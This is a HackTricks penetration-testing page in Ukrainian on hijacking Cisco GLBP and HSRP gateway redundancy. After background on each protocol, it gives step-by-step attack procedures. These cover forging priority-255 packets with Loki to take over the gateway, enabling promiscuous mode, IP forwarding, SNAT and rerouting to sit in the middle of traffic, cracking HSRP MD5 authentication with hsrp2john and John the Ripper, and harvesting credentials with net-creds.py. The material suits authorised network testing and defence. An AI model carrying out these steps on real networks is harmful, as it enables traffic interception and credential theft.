GLBP & HSRP Attacks

Вивчайте та практикуйте взлом AWS: Навчання HackTricks AWS Red Team Expert (ARTE) Вивчайте та практикуйте взлом GCP: Навчання HackTricks GCP Red Team Expert (GRTE)

Підтримайте HackTricks

Перевірте плани підписки!
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
Поширюйте хакерські трюки, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

Websec | Uw Cybersecurity Specialist

Огляд Викрадення FHRP

Відомості про FHRP

FHRP призначений для забезпечення надійності мережі шляхом об'єднання кількох маршрутизаторів в один віртуальний блок, що покращує розподіл навантаження та стійкість до відмов. Компанія Cisco Systems представила важливі протоколи в цьому наборі, такі як GLBP та HSRP.

Відомості про протокол GLBP

Створення Cisco, GLBP, працює на стеку TCP/IP, використовуючи UDP на порту 3222 для зв'язку. Маршрутизатори в групі GLBP обмінюються пакетами "hello" кожні 3 секунди. Якщо маршрутизатор не відправляє ці пакети протягом 10 секунд, вважається, що він вийшов з ладу. Однак ці таймери не є фіксованими і можуть бути змінені.

Операції та Розподіл Навантаження в GLBP

GLBP виділяється тим, що дозволяє розподіл навантаження між маршрутизаторами за допомогою однієї віртуальної IP-адреси, пов'язаної з кількома віртуальними MAC-адресами. У групі GLBP кожен маршрутизатор бере участь у пересиланні пакетів. На відміну від HSRP/VRRP, GLBP пропонує справжній балансування навантаження за допомогою кількох механізмів:

Балансування Навантаження Залежне від Хоста: Забезпечує постійне призначення MAC-адреси AVF хосту, що є важливим для стабільних конфігурацій NAT.
Кругове Балансування Навантаження: Стандартний підхід, чергування призначення MAC-адреси AVF серед запитуючих хостів.
Вагове Кругове Балансування Навантаження: Розподіл навантаження на основі попередньо визначених метрик "Вага".

Основні Компоненти та Термінологія в GLBP

AVG (Активний Віртуальний Шлюз): Основний маршрутизатор, відповідальний за призначення MAC-адрес маршрутизаторам-рівню.
AVF (Активний Віртуальний Пересилувач): Маршрутизатор, призначений для управління мережевим трафіком.
Пріоритет GLBP: Метрика, яка визначає AVG, починаючи зі значення за замовчуванням 100 і в діапазоні від 1 до 255.
Вага GLBP: Відображає поточне навантаження на маршрутизатор, яке можна налаштувати як вручну, так і через відстеження об'єктів.
Віртуальна IP-адреса GLBP: Використовується як шлюз за замовчуванням мережі для всіх підключених пристроїв.

Для взаємодії GLBP використовує зарезервовану мультікаст-адресу 224.0.0.102 та UDP-порт 3222. Маршрутизатори відправляють пакети "hello" кожні 3 секунди і вважаються неопераційними, якщо пакет пропущено протягом 10 секунд.

Механізм Атаки GLBP

Атакуючий може стати основним маршрутизатором, відправивши пакет GLBP з найвищим значенням пріоритету (255). Це може призвести до атак DoS або MITM, дозволяючи перехоплення або перенаправлення трафіку.

Виконання Атаки GLBP за допомогою Loki

Loki може виконати атаку GLBP, впроваджуючи пакет з встановленим пріоритетом та вагою 255. Перед атакою необхідно зібрати інформацію, таку як віртуальна IP-адреса, наявність аутентифікації та значення пріоритету маршрутизатора за допомогою інструментів, таких як Wireshark.

Кроки Атаки:

Перейдіть у режим прослуховування та увімкніть пересилання IP.
Визначте цільовий маршрутизатор та отримайте його IP.
Створіть вільний ARP.
Впроваджуйте зловмисний пакет GLBP, видаючи себе за AVG.
Призначте вторинну IP-адресу мережному інтерфейсу атакуючого, відображаючи віртуальну IP GLBP.
Реалізуйте SNAT для повної видимості трафіку.
Налаштуйте маршрутизацію, щоб забезпечити продовжений доступ до Інтернету через оригінальний маршрутизатор AVG.

Виконуючи ці кроки, атакуючий розміщує себе як "людина посередині", здатний перехоплювати та аналізувати мережевий трафік, включаючи незашифровані або чутливі дані.

Для демонстрації, ось необхідні фрагменти команд:

# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Пасивне пояснення про викрадення HSRP з командними деталями

Огляд HSRP (Протокол гарячого резервування маршрутизатора/протокол забезпечення резервування)

HSRP є пропрієтарним протоколом Cisco, призначеним для забезпечення резервування мережевих шлюзів. Він дозволяє конфігурувати кілька фізичних маршрутизаторів у єдину логічну одиницю зі спільною IP-адресою. Ця логічна одиниця керується основним маршрутизатором, відповідальним за направлення трафіку. На відміну від GLBP, який використовує метрики, такі як пріоритет та вага для балансування навантаження, HSRP покладається на один активний маршрутизатор для керування трафіком.

Ролі та термінологія в HSRP

Активний маршрутизатор HSRP: пристрій, який діє як шлюз, керуючи потоком трафіку.
Резервний маршрутизатор HSRP: резервний маршрутизатор, готовий взяти на себе функції активного маршрутизатора у разі його відмови.
Група HSRP: набір маршрутизаторів, які співпрацюють для утворення одного стійкого віртуального маршрутизатора.
MAC-адреса HSRP: віртуальна MAC-адреса, призначена для логічного маршрутизатора в налаштуванні HSRP.
Віртуальна IP-адреса HSRP: віртуальна IP-адреса групи HSRP, яка діє як шлюз за замовчуванням для підключених пристроїв.

Версії HSRP

HSRP має дві версії, HSRPv1 та HSRPv2, що відрізняються головним чином ємністю груп, використанням мультикастових IP-адрес для обміну інформацією та структурою віртуальної MAC-адреси. Протокол використовує конкретні мультикастові IP-адреси для обміну інформацією про послуги, з Hello-пакетами, що відправляються кожні 3 секунди. Маршрутизатор вважається неактивним, якщо не отримано жодного пакета протягом 10 секунд.

Механізм атаки HSRP

Атаки HSRP включають примусове захоплення ролі Активного маршрутизатора шляхом впровадження максимального значення пріоритету. Це може призвести до атаки типу "Людина посередині" (MITM). Необхідні передатактні кроки включають збір даних про налаштування HSRP, що може бути виконано за допомогою Wireshark для аналізу трафіку.

Кроки для обхіду аутентифікації HSRP

Збережіть мережевий трафік, що містить дані HSRP, у файл .pcap.

tcpdump -w hsrp_traffic.pcap

Витягніть хеші MD5 з файлу .pcap, використовуючи hsrp2john.py.

python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes

Відкрийте хеші MD5 за допомогою John the Ripper.

john --wordlist=mywordlist.txt hsrp_hashes

Виконання впровадження HSRP за допомогою Loki

Запустіть Loki для ідентифікації реклам HSRP.
Встановіть мережевий інтерфейс у режим підслуховування та увімкніть пересилання IP.

sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

Використовуйте Loki для спрямування на конкретний маршрутизатор, введіть розкритий пароль HSRP та виконайте необхідні налаштування для видачі себе за Активний маршрутизатор.
Після отримання ролі Активного маршрутизатора налаштуйте мережевий інтерфейс та IP-таблиці для перехоплення законного трафіку.

sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

Змініть таблицю маршрутизації для маршрутизації трафіку через колишній Активний маршрутизатор.

sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Використовуйте net-creds.py або подібну утиліту для захоплення облікових даних з перехопленого трафіку.

sudo python2 net-creds.py -i eth0

Виконання цих кроків ставить атакуючого в положення для перехоплення та маніпулювання трафіком, аналогічно процедурі викрадення GLBP. Це підкреслює вразливість протоколів резервування, таких як HSRP, та необхідність надійних заходів безпеки.

Посилання

https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9

Websec | Uw Cybersecurity Specialist

PreviousEIGRP Attacks NextIDS and IPS Evasion

Last updated 4 months ago